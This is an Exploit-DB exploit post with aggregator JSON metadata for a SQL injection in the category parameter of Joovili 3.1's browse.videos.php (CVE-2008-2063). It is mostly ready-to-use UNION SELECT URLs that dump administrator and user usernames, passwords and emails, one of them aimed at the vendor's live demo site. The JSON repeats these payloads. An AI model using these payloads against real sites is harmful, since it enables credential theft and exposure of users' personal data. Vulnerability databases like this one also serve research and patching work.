ID EDB-ID:5520
Type exploitdb
Reporter HaCkeR_EgY
Modified 2008-04-28T00:00:00
Description
Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability. CVE-2008-2063. Webapps exploit for php platform
#####################################################
# [-Joovili-] #
# Rem0te SQL Injection Vulnerability #
# IN ==> browse.videos.php <==== #
#####################################################
[<>]Author: HaCkeR-EgY
[<>]H^0mE: WWW.PAL-HACKER.COM , ATSDP.COM
[<>]CONTact: hacker_EGY@hotmail.com
================================================
[<>]Script : Joovili
[<>]version : Version 3.1.0
[<>]price :$155 USD
[<>]DOWNL0AD : www.joovili.com
================================================
[<>] D0RK : use your Mind (:
[<>] Explo!t :
[<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/*
[<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/*
[<>] L!Ve DeM0 :
====> http://demo.joovili.com/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,6,7,8,9/**/from/**/joovili_admins/*
[<>]N0te :::>> 1- Sometime Requires to register
&n bsp; 2- You can Find other Errors
=======================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
[<>] Greetz : F!resell , Mohamed el Arab , MrExE , H-T Team [ HouSSaMix +
ToXiC350 ] , Gold_M , V4 Team , Jiki Team , RoMaNcYxHaCkEr , stR0ke
# milw0rm.com [2008-04-28]
{"published": "2008-04-28T00:00:00", "id": "EDB-ID:5520", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "0ba8826bfe687045a6e005d9dc995eebc5c6c0e20f988c1d8c4a69c499142643", "description": "Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability. CVE-2008-2063. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/5520/", "lastseen": "2016-01-31T22:14:01", "edition": 1, "title": "Joovili 3.1 browse.videos.php category SQL Injection Vulnerability", "osvdbidlist": ["44670"], "modified": "2008-04-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": ["CVE-2008-2063"], "sourceHref": "https://www.exploit-db.com/download/5520/", "references": [], "reporter": "HaCkeR_EgY", "sourceData": "#####################################################\n# [-Joovili-] \t\t #\n# Rem0te SQL Injection Vulnerability \t #\n# IN ==> browse.videos.php <==== \t #\n#####################################################\n \n[<>]Author: HaCkeR-EgY\n \n[<>]H^0mE: WWW.PAL-HACKER.COM , ATSDP.COM\n \n[<>]CONTact: hacker_EGY@hotmail.com\n================================================\n[<>]Script : Joovili\n[<>]version : Version 3.1.0\n[<>]price :$155 USD\n[<>]DOWNL0AD : www.joovili.com\n================================================\n[<>] D0RK : use your Mind (:\n \n[<>] Explo!t :\n\n[<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/*\n\n[<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/*\n\n[<>] L!Ve DeM0 :\n \n====> http://demo.joovili.com/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,6,7,8,9/**/from/**/joovili_admins/*\n \n\n[<>]N0te :::>> 1- Sometime Requires to register\n &n bsp; 2- You can Find other Errors\n=======================================================\n[<>] Thanx : MY Brotha and MY Master \" Abo Mohamed \"\n[<>] Greetz : F!resell , Mohamed el Arab , MrExE , H-T Team [ HouSSaMix +\nToXiC350 ] , Gold_M , V4 Team , Jiki Team , RoMaNcYxHaCkEr , stR0ke\n\n# milw0rm.com [2008-04-28]\n", "objectVersion": "1.2"}
{"result": {"cve": [{"id": "CVE-2008-2063", "type": "cve", "title": "CVE-2008-2063", "description": "SQL injection vulnerability in browse.videos.php in Joovili 3.1 allows remote attackers to execute arbitrary SQL commands via the category parameter.", "published": "2008-05-02T19:20:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2063", "cvelist": ["CVE-2008-2063"], "lastseen": "2017-09-29T14:25:52"}]}}